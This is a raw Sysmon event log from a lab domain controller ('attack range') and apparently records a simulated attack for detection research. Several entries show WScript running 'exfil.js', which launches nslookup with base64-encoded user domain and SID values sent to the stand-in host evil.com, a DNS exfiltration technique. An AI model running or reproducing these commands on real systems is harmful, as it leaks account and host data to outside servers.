14:21:27.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0243-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.424{2E1864BB-18E7-629A-0043-000000005F02}6087024C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-0243-000000005F02}3568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.428{2E1864BB-18E7-629A-0243-000000005F02}3568C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0043-000000005F02}608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakeu.tmp 2>&1 10341000x8000000000000000207393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.393{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0143-000000005F02}7364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.393{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-0143-000000005F02}7364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.393{2E1864BB-18E7-629A-0143-000000005F02}73647788C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-0043-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0143-000000005F02}7364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-0043-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-18E0-629A-6742-000000005F02}39766604C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-0043-000000005F02}608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.385{2E1864BB-18E7-629A-0043-000000005F02}608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakeu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.377{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsjpi.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-18E7-629A-FE42-000000005F02}59087744C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-FF42-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FF42-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.340{2E1864BB-18E7-629A-FD42-000000005F02}39645700C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-FF42-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.349{2E1864BB-18E7-629A-FF42-000000005F02}3724C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-FD42-000000005F02}3964C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsjpi.tmp 2>&1 10341000x8000000000000000207373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.325{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-FE42-000000005F02}5908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.325{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-FE42-000000005F02}5908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.308{2E1864BB-18E7-629A-FE42-000000005F02}59087744C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-FD42-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000207370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.780{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61893-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.780{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50524- 354300x8000000000000000207368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-50523-false127.0.0.1-53domain 354300x8000000000000000207367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50523- 354300x8000000000000000207366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-50523-false127.0.0.1-53domain 